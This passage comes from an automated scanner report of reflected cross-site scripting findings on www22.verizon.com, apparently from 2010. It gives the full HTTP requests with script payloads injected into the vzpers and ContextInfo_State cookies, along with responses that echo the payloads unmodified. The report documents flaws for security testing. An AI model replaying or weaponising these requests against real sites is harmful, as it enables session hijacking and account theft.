Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXfd5c6'><script>alert(1)</script>77fabe85400; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50803
Expires: Mon, 13 Dec 2010 01:00:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:01 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 01:00:00 GMT; path=/
Set-Cookie: FLOWTYPE=VASIP; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 01:00:00 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 01:00:00 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Entertainment on Demand
</title><meta name="keywords" content="verizon entertainment on demand, verizon eod, verizon games, verizon movies
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXFD5C6'><SCRIPT>ALERT(1)</SCRIPT>77FABE85400 ' />
...[SNIP]...

1.61. http://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 22f18'><script>alert(1)</script>b01373682be was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX22f18'><script>alert(1)</script>b01373682be; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58527
Expires: Mon, 13 Dec 2010 00:51:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:04 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:51:04 GMT; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:51:04 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:51:04 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FiOS Internet | Check Availability
</title><meta name="keywords" content="fios internet check availability, fios availability, fios check
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX22F18'><SCRIPT>ALERT(1)</SCRIPT>B01373682BE ' />
...[SNIP]...

1.62. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Equipment/Equipment.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2dec6'><script>alert(1)</script>f46e0b8a85b was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX2dec6'><script>alert(1)</script>f46e0b8a85b; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69867
Expires: Mon, 13 Dec 2010 00:53:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:39 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:53:38 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:39 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:39 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:39 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2DEC6'><SCRIPT>ALERT(1)</SCRIPT>F46E0B8A85B ' />
...[SNIP]...

1.63. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Equipment/Equipment.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 95b71<script>alert(1)</script>8cd84a0e406 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX95b71<script>alert(1)</script>8cd84a0e406; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69863
Expires: Mon, 13 Dec 2010 00:53:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:45 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX95B71<SCRIPT>ALERT(1)</SCRIPT>8CD84A0E406 </DIV>
...[SNIP]...

1.64. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Overview.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload dac27<script>alert(1)</script>35d3559249 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXdac27<script>alert(1)</script>35d3559249; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119205
Expires: Mon, 13 Dec 2010 00:51:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:59 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:59 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:59 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:59 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:59 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDAC27<SCRIPT>ALERT(1)</SCRIPT>35D3559249 </DIV>
...[SNIP]...

1.65. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Overview.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b85b'><script>alert(1)</script>39fdf9f1de3 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX1b85b'><script>alert(1)</script>39fdf9f1de3; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 117669
Expires: Mon, 13 Dec 2010 00:51:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1B85B'><SCRIPT>ALERT(1)</SCRIPT>39FDF9F1DE3 ' />
...[SNIP]...

1.66. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32738'><script>alert(1)</script>e346393f711 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX32738'><script>alert(1)</script>e346393f711; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 150532
Expires: Mon, 13 Dec 2010 00:53:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:29 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:29 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:29 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:29 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX32738'><SCRIPT>ALERT(1)</SCRIPT>E346393F711 ' />
...[SNIP]...

1.67. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload e1049<script>alert(1)</script>df8eebbe858 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXe1049<script>alert(1)</script>df8eebbe858; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 148986
Expires: Mon, 13 Dec 2010 00:53:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:36 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:36 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE1049<SCRIPT>ALERT(1)</SCRIPT>DF8EEBBE858 </DIV>
...[SNIP]...

1.68. http://www22.verizon.com/Residential/FiOSTV/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff241'><script>alert(1)</script>701d51eb30b was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXff241'><script>alert(1)</script>701d51eb30b; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110727
Expires: Mon, 13 Dec 2010 00:51:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:36 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXFF241'><SCRIPT>ALERT(1)</SCRIPT>701D51EB30B ' />
...[SNIP]...

1.69. http://www22.verizon.com/Residential/FiOSTV/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload e3746<script>alert(1)</script>02f08d404c8 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXe3746<script>alert(1)</script>02f08d404c8; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110723
Expires: Mon, 13 Dec 2010 00:51:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:39 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:39 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:39 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:39 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:39 GMT; path=/

